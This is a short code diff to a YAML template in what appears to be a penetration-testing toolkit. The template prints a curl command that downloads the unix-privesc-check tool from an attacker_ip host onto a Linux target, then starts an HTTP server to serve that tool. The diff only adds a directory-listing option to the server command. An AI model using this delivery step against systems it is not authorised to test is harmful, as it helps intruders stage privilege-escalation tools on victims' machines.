--- a/src/profi/templates/scripts/deliver-linux-unix-privesc-check.yaml
+++ b/src/profi/templates/scripts/deliver-linux-unix-privesc-check.yaml
@@ -11,4 +11,4 @@ content: |
   echo '                       -----Linux------                         '; \
   echo 'Deliver only: curl http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/unix-privesc-check -o -o <%=$(esh variables/delivery_path_linux)%>/unix-privesc-check'; \
   echo '================================================================'; \
-   python <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py -p <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
+   python <%=$(esh variables/templates_dir)%>/helper_scripts/startEnhancedHttpServer.py -p <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound <%=$(esh variables/delivery_dir_listing)%>
